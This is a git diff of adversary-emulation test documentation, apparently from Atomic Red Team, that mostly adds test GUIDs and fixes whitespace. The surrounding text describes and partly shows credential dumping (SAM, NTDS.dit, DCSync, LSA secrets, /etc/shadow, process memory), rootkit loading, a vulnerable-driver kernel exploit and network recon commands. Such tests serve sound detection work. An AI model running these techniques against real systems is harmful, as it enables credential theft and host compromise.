## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames -Executes a hashdump by reading the hasshes from the registry. +auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 + +Executes a hashdump by reading the hasshes from the registry. **Supported Platforms:** Windows diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 60657899..c89af84f 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -30,17 +30,19 @@ The following tools and techniques can be used to enumerate the NTDS file and th
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin + +auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| @@ -59,7 +61,7 @@ vssadmin.exe create shadow /for=#{drive_letter} ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: ```cmd -reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: ```cmd @@ -73,6 +75,9 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy + +auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03 + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. @@ -80,14 +85,13 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1| | extract_path | Path for extracted NTDS.dit | Path | C:\Windows\Temp| @@ -115,7 +119,7 @@ del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: ```cmd -reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: ```cmd @@ -124,7 +128,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually ##### Description: Volume shadow copy must exist ##### Check Prereq Commands: ```cmd -if not exist #{vsc_name} (exit /b 1) +if not exist #{vsc_name} (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -133,7 +137,7 @@ echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with ##### Description: Extract path must exist ##### Check Prereq Commands: ```cmd -if not exist #{extract_path} (exit /b 1) +if not exist #{extract_path} (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -147,6 +151,9 @@ mkdir #{extract_path}
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil + +auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723 + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability @@ -154,14 +161,13 @@ uses the "IFM" or "Install From Media" backup functionality that allows Active D subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_folder | Path where resulting dump should be placed | Path | C:\Windows\Temp\ntds_T1003| @@ -185,7 +191,7 @@ rmdir /q /s #{output_folder} >nul 2>&1 ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: ```cmd -reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: ```cmd @@ -199,17 +205,19 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #4 - Create Volume Shadow Copy with WMI + +auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| @@ -228,7 +236,7 @@ wmic shadowcopy call create Volume=#{drive_letter} ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: ```cmd -reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: ```cmd @@ -242,17 +250,19 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #5 - Create Volume Shadow Copy with Powershell + +auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| @@ -273,17 +283,19 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
## Atomic Test #6 - Create Symlink to Volume Shadow Copy + +auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| | symlink_path | symlink path | String | C:\Temp\vssstore| diff --git a/atomics/T1003.004/T1003.004.md b/atomics/T1003.004/T1003.004.md index 244802ff..05973de3 100644 --- a/atomics/T1003.004/T1003.004.md +++ b/atomics/T1003.004/T1003.004.md @@ -12,18 +12,20 @@
## Atomic Test #1 - Dumping LSA Secrets + +auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f + Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder\T1003.004\bin\PsExec.exe| @@ -46,7 +48,7 @@ del %temp%\secrets >nul 2> nul ##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{psexec_exe}) {exit 0} else {exit 1} +if (Test-Path #{psexec_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md index f86b639b..c6708587 100644 --- a/atomics/T1003.006/T1003.006.md +++ b/atomics/T1003.006/T1003.006.md @@ -14,18 +14,20 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
## Atomic Test #1 - DCSync + +auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e + Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Targeted domain | string | example.com| | user | Targeted user | string | krbtgt| @@ -47,7 +49,7 @@ Privileges required: domain admin or domain controller account (by default), or ##### Check Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index a23a5e9c..99420fb6 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -14,16 +14,18 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
## Atomic Test #1 - Dump individual process memory with sh (Local) + +auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| | script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| @@ -56,7 +58,7 @@ rm -f "#{output_file}" ##### Check Prereq Commands: ```sh test -f #{script_path} -grep "#{pid_term}" #{script_path} +grep "#{pid_term}" #{script_path} ``` ##### Get Prereq Commands: ```sh @@ -71,16 +73,18 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa
## Atomic Test #2 - Dump individual process memory with Python (Local) + +auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 + Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| | script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| @@ -111,7 +115,7 @@ rm -f "#{output_file}" ##### Check Prereq Commands: ```sh test -f #{script_path} -grep "#{pid_term}" #{script_path} +grep "#{pid_term}" #{script_path} ``` ##### Get Prereq Commands: ```sh @@ -121,7 +125,7 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa ##### Description: Requires Python ##### Check Prereq Commands: ```sh -(which python || which python3 || which python2) +(which python || which python3 || which python2) ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index 52491f16..fb75bbaa 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -15,15 +15,17 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
## Atomic Test #1 - Access /etc/shadow (Local) -/etc/shadow file is accessed in Linux environments +auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 + +/etc/shadow file is accessed in Linux environments **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| @@ -49,15 +51,17 @@ rm -f #{output_file}
## Atomic Test #2 - Access /etc/passwd (Local) -/etc/passwd file is accessed in Linux environments +auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d + +/etc/passwd file is accessed in Linux environments **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 45930a48..8b9193ca 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -15,6 +15,9 @@ Several of the tools mentioned in associated sub-techniques may be used by both
## Atomic Test #1 - Gsecdump + +auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9 + Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. @@ -23,14 +26,13 @@ If you see output that says "compat: error: failed to create child process", exe You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe| | gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC| @@ -51,7 +53,7 @@ If you see a message saying "The system cannot find the path specified", try usi ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} +if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -70,11 +72,13 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
## Atomic Test #2 - Credential Dumping with NPPSpy + +auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 + Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy - **Supported Platforms:** Windows @@ -114,7 +118,7 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore ##### Description: NPPSpy.dll must be available in local temp directory ##### Check Prereq Commands: ```powershell -if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} +if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1006/T1006.md b/atomics/T1006/T1006.md index 5a6e5d8d..203a2b06 100644 --- a/atomics/T1006/T1006.md +++ b/atomics/T1006/T1006.md @@ -12,6 +12,9 @@ Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Cit
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell) + +auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b + This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. @@ -21,14 +24,13 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti 00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS ``` - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | volume | Drive letter of the volume to access | string | C:| diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index d08caf66..7cb3c441 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -12,10 +12,12 @@
## Atomic Test #1 - System Service Discovery + +auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71 + Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. - **Supported Platforms:** Windows @@ -40,17 +42,19 @@ sc query state= all
## Atomic Test #2 - System Service Discovery - net.exe + +auto_generated_guid: 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 + Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt| diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index c8263dd5..e706e035 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -10,17 +10,19 @@
## Atomic Test #1 - List Process Main Windows - C# .NET + +auto_generated_guid: fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 + Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs| | output_file_name | Name of output binary | string | %TEMP%\T1010.exe| @@ -45,7 +47,7 @@ del /f /q /s #{output_file_name} >nul 2>&1 ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{input_source_code}) {exit 0} else {exit 1} +if (Test-Path #{input_source_code}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 58233009..650fef02 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -12,6 +12,9 @@ The Registry contains a significant amount of information about the operating sy
## Atomic Test #1 - Query Registry + +auto_generated_guid: 8f7578c4-9863-4d83-875c-a565573bbdf0 + Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: @@ -19,7 +22,6 @@ https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-se https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf - **Supported Platforms:** Windows diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index e9f81566..62b1a33f 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -16,15 +16,17 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
## Atomic Test #1 - Loadable Kernel Module based Rootkit -Loadable Kernel Module based Rootkit +auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 + +Loadable Kernel Module based Rootkit **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux| | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko| @@ -50,7 +52,7 @@ sudo rmmod #{rootkit_name} ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}) ##### Check Prereq Commands: ```bash -if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; +if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -68,15 +70,17 @@ mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
## Atomic Test #2 - Loadable Kernel Module based Rootkit -Loadable Kernel Module based Rootkit +auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f + +Loadable Kernel Module based Rootkit **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux| | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko| @@ -104,7 +108,7 @@ sudo depmod -a ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}) ##### Check Prereq Commands: ```bash -if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; +if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -123,6 +127,9 @@ sudo depmod -a
## Atomic Test #3 - Windows Signed Driver Rootkit Test + +auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae + This test exploits a signed driver to execute code in Kernel. This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html @@ -132,14 +139,13 @@ https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.htm The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | driver_path | Path to a vulnerable driver | Path | C:\Drivers\driver.sys| | puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder\T1014\bin\puppetstrings.exe| @@ -159,7 +165,7 @@ This will simulate hiding a process. ##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} +if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 4ddc6913..fcc7fb8d 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -26,10 +26,12 @@ Adversaries may use the information from [System Network Configuration Discovery
## Atomic Test #1 - System Network Configuration Discovery on Windows + +auto_generated_guid: 970ab6a1-0157-4f3f-9a73-ec4166754b23 + Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. - **Supported Platforms:** Windows @@ -56,10 +58,12 @@ net config
## Atomic Test #2 - List Windows Firewall Rules + +auto_generated_guid: 038263cb-00f4-4b0a-98ae-0696c67e1752 + Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. - **Supported Platforms:** Windows @@ -82,10 +86,12 @@ netsh advfirewall firewall show rule name=all
## Atomic Test #3 - System Network Configuration Discovery + +auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 + Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. - **Supported Platforms:** macOS, Linux @@ -111,10 +117,12 @@ if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style) + +auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2 + Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout. - **Supported Platforms:** Windows @@ -140,18 +148,20 @@ nltest /domain_trusts
## Atomic Test #5 - List Open Egress Ports + +auto_generated_guid: 4b467538-f102-491d-ace7-ed487b853bf5 + This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path of file to write port scan results | Path | $env:USERPROFILE\Desktop\open-ports.txt| | portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt| @@ -201,7 +211,7 @@ Remove-Item -ErrorAction ignore "#{output_file}" ##### Description: Test requires #{port_file} to exist ##### Check Prereq Commands: ```powershell -if (Test-Path "#{port_file}") {exit 0} else {exit 1} +if (Test-Path "#{port_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -216,16 +226,18 @@ Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects + +auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -244,7 +256,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -258,15 +270,17 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Qakbot Recon -A list of commands known to be performed by Qakbot for recon purposes +auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b + +A list of commands known to be performed by Qakbot for recon purposes **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder\T1016\src\qakbot.bat| @@ -287,12 +301,14 @@ A list of commands known to be performed by Qakbot for recon purposes
## Atomic Test #8 - List macOS Firewall Rules + +auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88 + "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. - **Supported Platforms:** macOS diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index eff14164..2f288279 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -32,10 +32,12 @@ Specific to macOS, the bonjour protocol exists to discover addition
## Atomic Test #1 - Remote System Discovery - net + +auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd + Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled. - **Supported Platforms:** Windows @@ -59,10 +61,12 @@ net view
## Atomic Test #2 - Remote System Discovery - net group Domain Computers + +auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f + Identify remote systems with net.exe querying the Active Directory Domain Computers group. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout. - **Supported Platforms:** Windows @@ -85,17 +89,19 @@ net group "Domain Computers" /domain
## Atomic Test #3 - Remote System Discovery - nltest + +auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 + Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_domain | Domain to query for domain controllers | String | domain.local| @@ -116,10 +122,12 @@ nltest.exe /dclist:#{target_domain}
## Atomic Test #4 - Remote System Discovery - ping sweep + +auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 + Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. - **Supported Platforms:** Windows @@ -142,10 +150,12 @@ for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
## Atomic Test #5 - Remote System Discovery - arp + +auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 + Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. - **Supported Platforms:** Windows @@ -168,10 +178,12 @@ arp -a
## Atomic Test #6 - Remote System Discovery - arp nix + +auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 + Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. - **Supported Platforms:** Linux, macOS @@ -192,7 +204,7 @@ arp -a | grep -v '^?' ##### Description: Check if arp command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -206,17 +218,19 @@ echo "Install arp on the machine."; exit 1;
